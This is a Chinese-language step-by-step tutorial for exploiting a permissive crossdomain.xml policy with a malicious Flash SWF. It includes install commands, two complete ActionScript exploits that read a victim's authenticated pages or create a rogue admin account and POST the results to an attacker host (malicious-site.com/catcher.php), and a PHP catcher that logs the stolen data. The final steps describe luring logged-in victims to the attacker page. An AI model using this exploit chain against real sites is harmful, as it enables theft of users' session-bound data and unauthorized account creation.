crossdomain.xml

参考：
https://hackerone.com/reports/43070
http://sethsec.blogspot.in/2014/07/crossdomain-bing.html
http://gursevkalra.blogspot.in/2013/08/bypassing-same-origin-policy-with-flash.html
http://sethsec.blogspot.in/2014/11/crossdomainxml-can-be-overly-permissive_18.html?view=sidebar

crossdomain.xml文件格式：

引用

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

通常规则：
1. crossdomain.xml文件在根目录下，例如www.secret-site.com/crossdomain.xml
2. crossdomain.xml权限过度自由
3. 在www.secret-site.com 上存在敏感信息或可以执行敏感动作
如果三条都满足，那么www.secret-site.com上的application将会给从恶意网站加载的swf敞开大门，从恶意网站www.malicious-site.com加载的swf现在可以绕过同源策略获得user拥有www.secret-site.com的权限。
主要问题是出在<allow-access-from domain="*">上。
如果https://www.secret-site.com/crossdomain.xml含有错误配置 <allow-access-from domain="*">，但是所有的敏感信息都放在https://secure.secret-site.com那么将不存在风险

在下面的例子中https://www.secret-site.com是含有错误配置crossdomain.xml <allow-access-from domain="*">,
1. 安装Adobe Flex

引用

apt-get install openjdk-6-jdk
mkdir /opt/flex
cd /opt/flex/
wget http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip
unzip flex_sdk_4.6.zip
chmod -R a+rx /opt/flex/
echo 'export PATH=/opt/flex/bin:$PATH' >> ~/.bashrc
chmod 755 bin/mxmlc

2. 下载Gursev的poc，".as"和".html"文件：

引用

mkdir /var/www/crossdomain
mkdir ~/crossdomain
cd ~
git clone https://github.com/gursev/flash-xdomain-xploit.git
cp flash-xdomain-xploit/xdx.html /var/www/crossdomain/
cp flash-xdomain-xploit/XDomainXploit.as ~/crossdomain/

vi ~/crossdomain/XDomainXploit.as

或者没有git客户端

引用

cd /var/www/crossdomain
wget https://raw.github.com/gursev/flash-xdomain-xploit/master/xdx.html

cd ~/crossdomain
wget https://raw.github.com/gursev/flash-xdomain-xploit/master/XDomainXploit.as

vi ~/crossdomain/XDomainXploit.as

3. 修改ActionScript来满足需要，替换victim URL和attacker URL就可以生成一个GET请求：

// POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
// XDomainXploit.as

package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;

public class XDomainXploit extends Sprite {
public function XDomainXploit() {
// Target URL from where the data is to be retrieved
var readFrom:String = [color=blue]"http://www.secret-site.com/account/info";[/color]
var readRequest:URLRequest = new URLRequest(readFrom);
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try {
getLoader.load(readRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}

private function eventHandler(event:Event):void {
// URL to which retrieved data is to be sent
var sendTo:String = [color=blue]"http://malicious-site.com/catcher.php"[/color]
var sendRequest:URLRequest = new URLRequest(sendTo);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try {
sendLoader.load(sendRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
}

}

或是下面代码来制作一个POST请求

// POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
// POC Modified to send POSTs and append HTTP headers: Seth Art
// XDomainXploit.as

package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLRequestHeader;
public class XDomainXploit3 extends Sprite {
public function XDomainXploit3() {
// Target URL from where the data is to be retrieved
var readFrom:String = "https://www.secret-site.com/admin/add";
var header:URLRequestHeader = new URLRequestHeader("Content-Type", "text/plain; charset=UTF-8");
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.method = URLRequestMethod.POST
readRequest.data = "{\"name\":\"CSRF-Admin\",\"Group\":\"admin\",\"password\":\"password\",\"confirmPassword\":\"password\"}";
readRequest.requestHeaders.push(header);
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try {
getLoader.load(readRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}

private function eventHandler(event:Event):void {
// URL to which retrieved data is to be sent
var sendTo:String = "http://www.malicious-site.com/crossdomain/catcher.php"
var sendRequest:URLRequest = new URLRequest(sendTo);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try {
sendLoader.load(sendRequest);
} catch (error:Error) {
trace("Error loading URL: " + error);
}
}
}

}

4. 使用xmmlc编译ActionScript

引用

/opt/flex/bin/mxmlc ~/crossdomain/XDomainXploit.as

5. 把生成的swf文件放到web的某个目录下

引用

mv ~/crossdomain/XDomainXploit.swf /var/www/crossdomain

6. 做一个catcher 文件。该php文件用来将所有的请求数据记录到/tmp文件夹下

vi /var/www/catcher.php

<?php

$data = file_get_contents("php://input");
$ret = file_put_contents('/tmp/thanks_for_sharing.txt', $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
die('Error writing to file');
}
else { 
echo "$ret bytes written to file";
}

?>

7. 安装php

引用

apt-get install php5

8. 设置SSL
这一步骤不是必须的，但是如果你的flash object使用HTTPS通信，并且secure="false" 没有设置，那么就需要设置。
下面两步是制作一个证书，但是你可以购买一个正式的证书，这样user不会出现SSL错误

引用

make-ssl-cert generate-default-snakeoil --force-overwrite
a2enmod ssl

a2ensite default-ssl

9启动web服务器

引用

/etc/init.d/apache2 restart

10.欺骗受害者访问www.malicious-site.com/crossdomain/xdx.html
11. 希望受害者访问的时候登陆了www.secret-site.com
12. 这时就可以收集和分析数据了

cat /tmp/thanks_for_sharing.txt